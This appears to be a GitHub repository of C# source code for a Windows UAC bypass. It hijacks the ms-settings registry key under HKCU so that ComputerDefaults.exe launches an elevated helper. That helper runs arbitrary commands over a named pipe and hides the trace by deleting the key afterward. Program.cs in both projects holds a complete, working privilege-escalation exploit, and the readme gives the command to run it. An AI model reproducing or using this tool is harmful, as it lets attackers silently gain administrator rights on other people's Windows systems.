├── img.png
├── readme.md
├── bypassUAC
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── bypassUAC.csproj
    └── Program.cs
├── PipeClient
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── Program.cs
    └── PipeClient.csproj
└── bypassUAC.sln


/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hzllaga/bypassUAC/HEAD/img.png


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | # 基于注册表劫持BypassUAC
 2 | 
 3 | 通过管道进行通信，可以在非交互模式运行。
 4 | 
 5 | ## 使用方式
 6 | 
 7 | 将`bypassUAC.exe`和`PipeClient.exe`放在同目录
 8 | 
 9 | ```
10 | .\bypassUAC.exe "whoami /priv"
11 | ```
12 | 
13 | ![](./img.png)
14 | 
15 | ## 参考链接
16 | 
17 | https://github.com/SkewwG/domainTools/tree/master/regeditBypassUAC
18 | 
19 | https://idiotc4t.com/privilege-escalation/bypassuac-fodhelper
20 | 
21 | 


--------------------------------------------------------------------------------
/bypassUAC/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 組件的一般資訊是由下列的屬性集控制。
 6 | // 變更這些屬性的值即可修改組件的相關
 7 | // 資訊。
 8 | [assembly: AssemblyTitle("bypassUAC")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("bypassUAC")]
13 | [assembly: AssemblyCopyright("Copyright ©  2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 將 ComVisible 設為 false 可對 COM 元件隱藏
18 | // 組件中的類型。若必須從 COM 存取此組件中的類型，
19 | // 的類型，請在該類型上將 ComVisible 屬性設定為 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 下列 GUID 為專案公開 (Expose) 至 COM 時所要使用的 typelib ID
23 | [assembly: Guid("c165dc03-35dc-4f85-b812-7001d9f4440c")]
24 | 
25 | // 組件的版本資訊由下列四個值所組成:
26 | //
27 | //      主要版本
28 | //      次要版本
29 | //      組建編號
30 | //      修訂
31 | //
32 | // 您可以指定所有的值，也可以使用 '*' 將組建和修訂編號
33 | // 設為預設，如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/PipeClient/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 組件的一般資訊是由下列的屬性集控制。
 6 | // 變更這些屬性的值即可修改組件的相關
 7 | // 資訊。
 8 | [assembly: AssemblyTitle("PipeClient")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PipeClient")]
13 | [assembly: AssemblyCopyright("Copyright ©  2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 將 ComVisible 設為 false 可對 COM 元件隱藏
18 | // 組件中的類型。若必須從 COM 存取此組件中的類型，
19 | // 的類型，請在該類型上將 ComVisible 屬性設定為 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 下列 GUID 為專案公開 (Expose) 至 COM 時所要使用的 typelib ID
23 | [assembly: Guid("ab6b90cf-7cca-4f73-833f-c21ed071344a")]
24 | 
25 | // 組件的版本資訊由下列四個值所組成:
26 | //
27 | //      主要版本
28 | //      次要版本
29 | //      組建編號
30 | //      修訂
31 | //
32 | // 您可以指定所有的值，也可以使用 '*' 將組建和修訂編號
33 | // 設為預設，如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/bypassUAC.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.30114.105
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "bypassUAC", "bypassUAC\bypassUAC.csproj", "{C165DC03-35DC-4F85-B812-7001D9F4440C}"
 7 | EndProject
 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PipeClient", "PipeClient\PipeClient.csproj", "{AB6B90CF-7CCA-4F73-833F-C21ED071344A}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|Any CPU = Debug|Any CPU
13 | 		Release|Any CPU = Release|Any CPU
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{C165DC03-35DC-4F85-B812-7001D9F4440C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | 		{C165DC03-35DC-4F85-B812-7001D9F4440C}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | 		{C165DC03-35DC-4F85-B812-7001D9F4440C}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | 		{C165DC03-35DC-4F85-B812-7001D9F4440C}.Release|Any CPU.Build.0 = Release|Any CPU
20 | 		{AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | 		{AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | 		{AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | 		{AB6B90CF-7CCA-4F73-833F-C21ED071344A}.Release|Any CPU.Build.0 = Release|Any CPU
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {8F57C9C2-8982-4160-A032-29AF00A39620}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/PipeClient/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.IO;
 4 | using System.IO.Pipes;
 5 | 
 6 | namespace PipeClient
 7 | {
 8 |     class Program
 9 |     {
10 |         static string ExecuteProcess(string command = "")
11 |         {
12 |             Process process = new Process();
13 |             process.StartInfo.FileName = "cmd.exe";
14 |             process.StartInfo.CreateNoWindow = true;
15 |             process.StartInfo.UseShellExecute = false;
16 |             process.StartInfo.RedirectStandardInput = true;
17 |             process.StartInfo.RedirectStandardOutput = true;
18 |             process.StartInfo.RedirectStandardError = true;
19 |             process.StartInfo.Arguments = "/c " + command;
20 |             process.Start();
21 |             string output = process.StandardOutput.ReadToEnd();
22 |             process.WaitForExit();
23 |             process.Close();
24 |             return output;
25 |         }
26 |         static void Main(string[] args)
27 |         {
28 |             using (NamedPipeClientStream client = new NamedPipeClientStream("bypassUAC_____Pipe@"))
29 |             {
30 |                 client.Connect();
31 |                 StreamReader sr = new StreamReader(client);
32 |                 StreamWriter sw = new StreamWriter(client);
33 |                 string cmd = sr.ReadLine();
34 |                 string[] stringSeparators = new string[] { "\r\n" };
35 |                 foreach (var line in ExecuteProcess(cmd).Split(stringSeparators, StringSplitOptions.None))
36 |                 {
37 |                     sw.WriteLine(line);
38 |                 }
39 |                 sw.Write("exit");
40 |                 sw.Flush();
41 |             }
42 |         }
43 |     }
44 | }


--------------------------------------------------------------------------------
/bypassUAC/bypassUAC.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{C165DC03-35DC-4F85-B812-7001D9F4440C}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>bypassUAC</RootNamespace>
10 |     <AssemblyName>bypassUAC</AssemblyName>
11 |     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <Deterministic>true</Deterministic>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Core" />
37 |     <Reference Include="System.Xml.Linq" />
38 |     <Reference Include="System.Data.DataSetExtensions" />
39 |     <Reference Include="Microsoft.CSharp" />
40 |     <Reference Include="System.Data" />
41 |     <Reference Include="System.Xml" />
42 |   </ItemGroup>
43 |   <ItemGroup>
44 |     <Compile Include="Program.cs" />
45 |     <Compile Include="Properties\AssemblyInfo.cs" />
46 |   </ItemGroup>
47 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
48 | </Project>


--------------------------------------------------------------------------------
/PipeClient/PipeClient.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{AB6B90CF-7CCA-4F73-833F-C21ED071344A}</ProjectGuid>
 8 |     <OutputType>WinExe</OutputType>
 9 |     <RootNamespace>PipeClient</RootNamespace>
10 |     <AssemblyName>PipeClient</AssemblyName>
11 |     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <Deterministic>true</Deterministic>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <PropertyGroup>
35 |     <StartupObject />
36 |   </PropertyGroup>
37 |   <ItemGroup>
38 |     <Reference Include="System" />
39 |     <Reference Include="System.Core" />
40 |     <Reference Include="System.Xml.Linq" />
41 |     <Reference Include="System.Data.DataSetExtensions" />
42 |     <Reference Include="Microsoft.CSharp" />
43 |     <Reference Include="System.Data" />
44 |     <Reference Include="System.Xml" />
45 |   </ItemGroup>
46 |   <ItemGroup>
47 |     <Compile Include="Program.cs" />
48 |     <Compile Include="Properties\AssemblyInfo.cs" />
49 |   </ItemGroup>
50 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
51 | </Project>


--------------------------------------------------------------------------------
/bypassUAC/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.IO;
 4 | using System.IO.Pipes;
 5 | using Microsoft.Win32;
 6 | 
 7 | namespace bypassUAC
 8 | {
 9 |     class Program
10 |     {
11 |         static void ExecuteProcess()
12 |         {
13 |             Process process = new Process();
14 |             process.StartInfo.FileName = "cmd.exe";
15 |             process.StartInfo.CreateNoWindow = true;
16 |             process.StartInfo.UseShellExecute = false;
17 |             process.StartInfo.RedirectStandardInput = true;
18 |             process.StartInfo.RedirectStandardOutput = true;
19 |             process.StartInfo.RedirectStandardError = true;
20 |             process.StartInfo.Arguments = "/c ComputerDefaults.exe";
21 |             process.Start();
22 |         }
23 |         static void Main(string[] args)
24 |         {
25 |             string cmd = args.Length == 0 ? "whoami /priv" :args[0];
26 | 
27 |             Console.WriteLine("Author: Hzllaga");
28 |             Console.WriteLine("Github: https://github.com/Hzllaga\n");
29 | 
30 |             RegistryKey regkey = Registry.CurrentUser
31 |                 .OpenSubKey("Software", true)
32 |                 .OpenSubKey("Classes", true)
33 |                 .CreateSubKey("ms-settings")
34 |                 .CreateSubKey("shell")
35 |                 .CreateSubKey("open")
36 |                 .CreateSubKey("command");
37 |             regkey.SetValue(default, System.Environment.CurrentDirectory + "\\PipeClient.exe");
38 |             regkey.SetValue("DelegateExecute", "");
39 |             
40 |             Console.WriteLine("[+] Registry key write successful.");
41 |             
42 |             using (NamedPipeServerStream server = new NamedPipeServerStream("bypassUAC_____Pipe@"))
43 |             {
44 |                 Console.WriteLine("[+] Pipe server established, waiting for connection.");
45 |                 ExecuteProcess();
46 |                 Console.WriteLine("[+] Process created.");
47 |                 server.WaitForConnection();
48 |                 StreamReader sr = new StreamReader(server);
49 |                 StreamWriter sw = new StreamWriter(server);
50 |                 Console.WriteLine("[+] Client connected, sending {0} command.", cmd);
51 |                 sw.WriteLine(cmd);
52 |                 sw.Flush();
53 |                 Console.WriteLine("======================================\n");
54 |                 string line;
55 |                 while ((line = sr.ReadLine()) != null)
56 |                 {
57 |                     if (line == "exit")
58 |                     {
59 |                         Console.WriteLine("\n======================================");
60 |                         server.Disconnect();
61 |                         break;
62 |                     }
63 |                     else
64 |                     {
65 |                         Console.WriteLine(line);
66 |                     }
67 |                     
68 |                 }
69 |                 Registry.CurrentUser
70 |                     .OpenSubKey("Software", true)
71 |                     .OpenSubKey("Classes", true)
72 |                     .DeleteSubKeyTree("ms-settings");
73 |                 Console.WriteLine("[+] Registry key clean successful.");
74 |                 Console.WriteLine("[+] Enjoy, bye!");
75 |             }
76 |         }
77 |     }
78 | }
79 | 


--------------------------------------------------------------------------------